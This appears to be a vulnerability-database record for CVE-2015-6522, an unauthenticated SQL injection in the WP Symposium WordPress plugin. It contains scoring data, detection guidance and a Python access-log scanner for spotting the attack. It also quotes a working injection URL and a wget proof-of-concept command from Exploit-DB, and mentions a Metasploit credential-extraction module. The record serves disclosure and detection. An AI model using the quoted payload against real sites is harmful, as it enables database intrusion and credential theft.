CVE-2015-6522
Published: 2015-08-19
Priority: P2 · 71 · high · CVSS 2.0: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public (Exploit-DB, Metasploit)
EPSS: 74.13% (99.4th percentile)
SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the size parameter to get_album_item.php.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpsymposium | wp_symposium | <= 15.7 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting /wp-content/plugins/wp-symposium/get_album_item.php with a non-integer or SQL-laden 'size' parameter, which is the injection point for this unauthenticated SQLi.
- The vulnerability is unauthenticated — no session or login cookie is required. Any GET request to get_album_item.php with a manipulated size parameter should be treated as suspicious.
- The Metasploit auxiliary module wp_symposium_sql_injection targets credential extraction via this endpoint; presence of this module's traffic patterns (automated sequential requests to get_album_item.php) indicates active exploitation.
- The vulnerability affects WP Symposium plugin versions before 15.8 only. Version 15.8 (released 2015-08-07) contains the patch; ensure the installed version is confirmed before treating traffic as malicious.
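The detection guidance above can be turned into a log check. The following is an added example, not code from this record or from the plugin vendor: it parses constructed Apache combined-format access-log lines (the sample lines and IPs are made up), flags requests to the get_album_item.php path from the record whose `size` parameter is not a plain integer, and counts per-source requests to that endpoint so bursts of sequential requests stand out. The log format and the integer-only expectation for `size` are assumptions.

```python
"""Flag access-log requests to WP Symposium's get_album_item.php whose
``size`` parameter is not a plain integer, and count per-IP hits on the
endpoint. Added example; the log lines below are constructed samples."""
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Endpoint named in the CVE record and detection notes.
ENDPOINT = "/wp-content/plugins/wp-symposium/get_album_item.php"

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2015:10:01:02 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=200 HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Aug/2015:10:01:09 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- HTTP/1.1" 200 48 "-" "Wget/1.16"
203.0.113.7 - - [19/Aug/2015:10:01:10 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=200%27 HTTP/1.1" 200 51 "-" "Wget/1.16"
203.0.113.9 - - [19/Aug/2015:10:02:00 +0000] "GET /wp-content/plugins/wp-symposium/get_album_item.php HTTP/1.1" 200 12 "-" "curl/7.38"
198.51.100.4 - - [19/Aug/2015:10:02:30 +0000] "GET /index.php?size=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Assumed combined-log layout: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
INT_RE = re.compile(r"^\d+$")


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """Split a request target into (path, [(key, value), ...]).

    The query is split on '&' and percent-decoded by hand so the result
    does not depend on parse_qs treating ';' as a separator (older Pythons do).
    """
    parts = urlsplit(target)
    params = []
    for pair in parts.query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return parts.path, params


def check_request(target):
    """Return a reason string when the request abuses the endpoint, else None.

    Only the vulnerable path is considered; a `size` value that is anything
    other than a run of digits (quotes, function calls, comment markers) is
    reported. Requests without `size` are not flagged.
    """
    path, params = query_params(target)
    if path != ENDPOINT:
        return None
    sizes = [v for k, v in params if k == "size"]
    bad = [v for v in sizes if not INT_RE.match(v)]
    if bad:
        return "non-integer size parameter: %r" % bad[0]
    return None


def scan_log(text):
    """Return (findings, per-IP hit counter) for a block of access-log text."""
    findings = []
    hits = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, _ = query_params(rec["target"])
        if path == ENDPOINT:
            hits[rec["ip"]] += 1  # every hit on the endpoint, benign or not
        reason = check_request(rec["target"])
        if reason:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "reason": reason})
    return findings, hits


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for f in found:
        print("%(ts)s %(ip)s %(reason)s" % f)
    for ip, n in counts.most_common():
        print("endpoint hits from %s: %d" % (ip, n))
```

Run against real logs, confirm the installed plugin version first (15.8 and later are patched, per the notes above), and tune the per-IP count threshold to the site's normal album traffic before alerting on it.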
No detection rules found.
Exploit-DB
WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection (exploitdb · 2015-08-18)
---
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ?
/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost//wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-0
Metasploit
WordPress Symposium Plugin SQL Injection (metasploit)
This module exploits a SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress, which allows remote attackers to extract credentials via the size parameter to get_album_item.php.
No writeups or analysis indexed.